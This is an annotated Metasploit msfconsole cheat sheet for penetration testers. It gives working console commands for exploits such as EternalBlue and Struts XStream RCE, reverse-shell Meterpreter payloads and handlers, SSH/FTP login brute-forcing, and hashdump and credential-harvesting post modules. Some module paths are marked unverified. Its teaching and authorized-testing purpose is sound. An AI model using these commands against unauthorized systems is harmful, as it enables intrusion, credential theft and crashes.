Msfconsole
Msfconsole is the primary interface to the Metasploit Framework: an interactive console for developing, testing and executing exploits — with payloads and post-exploitation modules — against systems you are explicitly authorized to test.
Installation
Linux/Ubuntu
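# Install Metasploit Framework from the distro repository.
# NOTE(review): the metasploit-framework package is carried by Kali/Parrot;
# stock Ubuntu/Debian repos do not ship it — use the Rapid7 installer below.
sudo apt update
sudo apt install metasploit-framework
# Or use the Rapid7 omnibus installer. Do not pipe a remote script straight
# into bash: fetch it to disk, read it, then run it. Whatever it does runs
# with your privileges (and it will ask for root to install packages).
curl -fsSL -o msf_install.sh https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/build/scripts/install.sh
less msf_install.sh
bash msf_install.sh
# Start PostgreSQL and create the msf role/database plus ~/.msf4/database.yml
sudo systemctl start postgresql
sudo msfdb init
# Verify the install
msfconsole -v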
macOS
# Homebrew. NOTE(review): this is a third-party tap, not one maintained by
# Rapid7 — inspect the formula after tapping (`brew cat metasploit`) before
# installing, and prefer the official Rapid7 installer when supply-chain
# provenance matters.
brew tap mdisselbeck/metasploit
brew install metasploit
# Or manual download from Rapid7 (official installer, same download page as Windows)
Windows
# Download the official installer from:
# https://www.metasploit.com/download
# Run installer. NOTE: Defender and most AV engines flag the framework's
# exploit/payload files, so the install is quarantined or left incomplete
# unless the install directory is excluded — do this on a dedicated lab
# machine or VM rather than weakening AV on a workstation you rely on.
# Or use WSL with the Ubuntu installation steps above
Basic Console Usage
Start Msfconsole
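# Start with the database initialised by msfdb (it writes ~/.msf4/database.yml)
msfdb init
msfconsole
# Point at a specific database config. Do NOT put credentials in a URL on
# the command line — they show up in `ps`, shell history and audit logs.
# Keep them in a YAML file readable only by you and pass it with -y.
msfconsole -y ~/.msf4/database.yml
# Start in quiet mode (no banner)
msfconsole -q
# Start with a resource script. .rc files run arbitrary console commands
# and can embed <ruby> blocks — review any script you did not write yourself.
msfconsole -r script.rc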
Navigation Commands
# List workspaces
workspace
# Create a workspace (-a) and switch to it; a bare name switches to an existing one
workspace -a testing
workspace testing
# List all modules of a type (very long output — prefer 'search')
show exploits
show payloads
show auxiliary
show post
show encoders
show nops
# Search for modules by keyword or by filter (type:, platform:, cve:, ...)
search ssh
search type:exploit platform:windows
search cve:2021-
# Show module info (description, targets, options, references)
info exploit/windows/smb/ms17_010_eternalblue
Exploitation Workflow
Basic Exploit Setup
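# Select the exploit module
use exploit/windows/smb/ms17_010_eternalblue
# Show options ('options' is an alias for 'show options')
options
show options
# Set required options. RHOSTS is the target specifier (host, range, CIDR
# or file:<path>); RHOST is kept only as an alias for it. Set one or the
# other — the original set a /24 and then a single host, which leaves it
# unclear what will actually be attacked.
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444
# Set payload (must be compatible with the module — 'show payloads' lists
# the compatible ones once a module is selected)
set PAYLOAD windows/meterpreter/reverse_tcp
show payloads
# Run the module's check routine first where one exists: it confirms the
# target looks vulnerable without firing the exploit.
check
# Run exploit — 'run' and 'exploit' are equivalent, use one of them
run
exploit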
Common Exploits
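# Windows SMB RCE (MS17-010). This exploit is known to be able to crash
# (BSOD) unpatched targets — get explicit approval before running it
# against anything that matters. LHOST is required for the reverse payload.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
exploit
# SSH login check. This is an auxiliary login scanner, not an exploit:
# ssh_login lives under auxiliary/scanner/ssh, not exploit/. It tries the
# supplied credentials (or USER_FILE/PASS_FILE lists); repeated attempts
# can lock accounts and are loud in auth logs.
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASSWORD password
run
# Apache Struts 2 REST plugin XStream RCE (CVE-2017-9805)
use exploit/multi/http/struts2_rest_xstream
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
exploit
# WordPress plugin upload. NOTE(review): confirm the exact module path with
# `search type:exploit wp_` first — this path could not be verified here
# and module paths change between releases.
use exploit/unix/webapp/wp_plugin_upload
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
exploit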
Payload Management
Meterpreter Payloads
# Windows Meterpreter, connect-back (target connects to LHOST:LPORT).
# NOTE: reverse_tcp is unencrypted and easy to spot on the wire;
# windows/meterpreter/reverse_https is the choice when that matters.
set PAYLOAD windows/meterpreter/reverse_tcp
# Windows Meterpreter, bind (listener opens on the target; you connect in)
set PAYLOAD windows/meterpreter/bind_tcp
# Linux x86 Meterpreter, connect-back (x64 variant: linux/x64/meterpreter/reverse_tcp)
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# macOS plain shell, connect-back. NOTE(review): this is the 32-bit x86
# payload; macOS dropped 32-bit binaries in 10.15, so an osx/x64 (or
# arm64) payload is the practical choice on current hosts.
set PAYLOAD osx/x86/shell_reverse_tcp
# Android Meterpreter, connect-back (typically packaged as an APK with msfvenom)
set PAYLOAD android/meterpreter/reverse_tcp
# PHP Meterpreter, connect-back (for web-app exploits that execute PHP)
set PAYLOAD php/meterpreter/reverse_tcp
# Python Meterpreter, connect-back (needs a Python interpreter on the target)
set PAYLOAD python/meterpreter/reverse_tcp
Set Payload Options
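# Set payload (a module runs with exactly one payload; option names are
# case-insensitive, so 'set payload ...' works too)
set PAYLOAD windows/meterpreter/reverse_tcp
# Set LHOST — the address the target connects back to, so it must be
# reachable from the target's network (not a 0.0.0.0 wildcard)
set LHOST 192.168.1.10
# Set LPORT (listening port)
set LPORT 4444
# Show options, including the selected payload's
show options
# There is no 'payload_type' option and no multi-payload datastore. To
# reuse the same payload across modules, set it globally instead:
setg PAYLOAD windows/meterpreter/reverse_tcp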
Post-Exploitation
Meterpreter Sessions
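# List active sessions
sessions
# Interact with session 1 (drops you into its Meterpreter/shell prompt)
sessions -i 1
# Background the current session and return to the msf prompt
background
# Kill session 1
sessions -k 1
# Show session details. The original repeated 'sessions -i 1' here, which
# interacts with the session rather than describing it; use the verbose
# listing instead.
sessions -v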
Meterpreter Commands
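# Drop into a native command shell on the target (cmd.exe on Windows).
# Everything until 'exit' runs on the target as the session's user — the
# original wrapped each command in 'cmd /c', which only spawns a second
# cmd.exe for nothing.
shell
whoami
ipconfig /all
exit
# File operations (Meterpreter commands, run from the meterpreter prompt)
upload /tmp/file.txt C:\\
# Do NOT try to download the registry hives directly — SAM/SYSTEM are
# locked by the OS while Windows is running, so the download fails. Dump
# the hashes instead (needs SYSTEM; 'getsystem' attempts the elevation).
getsystem
hashdump
# System info
sysinfo
getuid
getpid
# Process listing / termination (1234 is a placeholder PID)
ps
kill 1234
# Network info. NOTE(review): these are Meterpreter built-ins, not the
# target's binaries — confirm with '<cmd> -h' which flags your version accepts.
ifconfig
netstat -an
arp -a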
Post-Exploitation Modules
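# Use a post module from the msf prompt: select it, point it at a session, run.
# Dumped hashes are written to the workspace database — treat that DB as
# sensitive engagement data.
use post/windows/gather/hashdump
set SESSION 1
run
# From inside a Meterpreter session the same thing is one line
run post/windows/gather/hashdump
# Enumerate installed applications (the original labelled this 'users';
# for users see post/windows/gather/enum_logged_on_users)
run post/windows/gather/enum_applications
# Harvest credentials/hashes/tokens available to the session. This is not
# browser-specific; for Chrome data use post/windows/gather/enum_chrome
run post/windows/gather/credentials/credential_collector
# ARP sweep from the compromised host (internal network discovery)
run post/windows/gather/arp_scanner
# Find files. NOTE(review): this module path could not be confirmed —
# verify it with `search type:post search` before relying on it.
run post/windows/search/search_dwm_cache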
Handlers
Create Listener
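# Use the generic handler for payloads delivered outside msfconsole (e.g.
# msfvenom binaries). Exploit modules start their own handler, so this is
# not needed when running an exploit module.
use exploit/multi/handler
# Payload, LHOST and LPORT must match what the payload was generated with —
# the original never set LHOST, so the handler had nothing to bind to
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
# Run the listener in the foreground (blocks until a session arrives)
run
# Or run as a background job; without ExitOnSession=false the job exits
# after the first session and later callbacks are dropped
set ExitOnSession false
run -j
# View / kill background jobs
jobs -l
jobs -k 1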
Handler Options
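# Listen on all local interfaces. A reverse handler hands its stage to ANY
# client that connects — there is no authentication — so on a multi-homed
# or internet-facing box firewall the port or bind to one address.
set LHOST 0.0.0.0
# Behind NAT: LHOST is the address the payload connects back to, while
# ReverseListenerBindAddress is where the handler actually binds locally
set LHOST 203.0.113.10
set ReverseListenerBindAddress 192.168.1.10
# Keep the handler alive after the first session connects
set ExitOnSession false
# Handler properties (ReverseListenerBindAddress and friends live here)
show advanced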
Database & Workspace
Database Management
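# Initialize database (shell command: creates the PostgreSQL role/db and
# ~/.msf4/database.yml)
msfdb init
# Check database status (shell command)
msfdb status
# Delete database — destructive: every workspace, host, service, credential
# and loot record goes with it. Export from the console first if the data
# is engagement evidence.
db_export -f xml /path/to/backup.xml
msfdb delete
# Interact with the database from inside msfconsole
db_status
# NOTE(review): 'db_info' could not be confirmed as a console command;
# 'help' lists the db_* commands available in your build.
db_info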
Workspaces
# List workspaces (each workspace is a separate set of hosts/services/creds in the DB)
workspace
# Create workspace
workspace -a mytest
# Switch workspace
workspace mytest
# Add a note. NOTE(review): the exact flags vary by version — check
# `notes -h` in your build. Notes are persisted in the database, so anything
# sensitive typed here stays with the workspace.
notes -a "Target: 192.168.1.100"
# View notes
notes
Host & Network Scanning
Scanning
# Nmap scan with results stored in the current workspace (requires nmap on
# PATH and a connected DB — check db_status first). -sV on a /24 is slow
# and noisy; keep it to in-scope ranges.
db_nmap -sV 192.168.1.0/24
# View hosts recorded by the scan
hosts
# View services recorded by the scan
services
# SMB version fingerprint — identifies OS / SMB dialect; it is not a
# vulnerability scanner, pair it with search + check to find exploitable hosts
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
Auxiliary Modules
Common Auxiliary Modules
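# Port scanner. NOTE(review): the nmap/nmap module path could not be
# confirmed — nmap integration is normally the db_nmap console command;
# the framework's own TCP port scanner is portscan/tcp.
use auxiliary/scanner/nmap/nmap
set RHOSTS 192.168.1.100
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
run
# Service fingerprint (SMB). Every module below needs 'run' — the original
# selected and configured them but never executed anything.
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.100
run
# FTP login check. Login scanners try credentials; with USER_FILE/PASS_FILE
# they brute-force, which can lock accounts and is loud — agree it with the
# client first.
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
run
# SSH username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
run
# Web directory enumeration (DICTIONARY selects the wordlist)
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
run
# VNC login check (same lockout caveat as ftp_login)
use auxiliary/scanner/vnc/vnc_login
set RHOSTS 192.168.1.100
run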
Options Management
Setting & Viewing Options
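# Set option (module datastore)
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444
# Unset an option — the name must match what was set (RHOSTS, not RHOST)
unset RHOSTS
# Clear all options
unset all
# There are no user variables in msfconsole and 'payload_type' is not an
# option. To carry a value across modules, set it in the global datastore:
setg LHOST 192.168.1.10
# Show options (basic / advanced)
options
show options
show advanced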
Resource Scripts
Create Automation Script
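# Create a resource script. Quote the heredoc delimiter so the shell never
# expands anything inside it — the file is plain msfconsole commands.
cat << 'EOF' > exploit.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
run
EOF
# Run the script. It fires the exploit as soon as the console is up, and
# .rc files can embed <ruby> blocks, so never run one you have not read.
msfconsole -r exploit.rc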
Example Scripts
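# Scan and store results. db_nmap is a console command, not a module —
# the original 'use db_nmap' / 'scan -sV' lines are not valid.
db_nmap -sV 192.168.1.0/24
# Multi-target exploit: one host per line in the file. This fires a
# crash-capable SMB exploit at every listed host, so keep the list to
# hosts that are in scope and approved for it.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/hosts.txt
set LHOST 192.168.1.10
run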
Tips & Tricks
Useful Commands
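# Clear screen. msfconsole passes unknown commands through to the system
# shell, so 'clear' works on Linux/macOS; 'cls' is the Windows form.
cls
clear
# Show banner
banner
# Show history. Commands are also saved to ~/.msf4/history, which will
# contain any password you typed with 'set' — protect or prune that file.
history
# Set global options (apply to every module selected from now on)
setg LHOST 192.168.1.10
setg LPORT 4444
# Show global options — there is no 'show global'; setg with no arguments
# prints the global datastore
setg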
Exploitation Tips
- Confirm written authorization and scope before touching any target; nothing here is safe to point at hosts you are not cleared to test
- Always scan and fingerprint targets first
- Match the exploit to the target OS/version and run `check` where the module supports it
- Use appropriate payloads (staged reverse_tcp is unencrypted; reverse_https when traffic inspection is a concern)
- Set up handlers before running exploits that need one (multi/handler for msfvenom payloads; exploit modules start their own)
- Expect IDS/IPS alerts and coordinate with the defenders where the engagement rules allow
- Document all activities (msfconsole saves commands to ~/.msf4/history, and the database records hosts, services and credentials)
- Clean up artifacts post-exploitation (uploaded files, added users, persistence, dropped binaries)
Common Workflows
Penetration Testing Workflow
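# 1. Fingerprint SMB across the subnet (results land in the workspace DB)
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# 2. Review what was found and look for matching exploits
#    ('show services' is not a command — the DB view is 'services')
services
search type:exploit platform:windows
# 3. Prepare exploit. An exploit module starts its own handler for the
#    payload it delivers, so a separate multi/handler is not needed. The
#    original's step 4 selected the handler, which would have replaced
#    this module — its 'exploit' would then have run the handler, not
#    EternalBlue.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
# 4. Confirm the target looks vulnerable, then fire
check
exploit
# 5. Post-exploit: hashdump needs SYSTEM, so elevate first
sessions -i 1
getsystem
run post/windows/gather/hashdump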
Last updated: 2025-03-30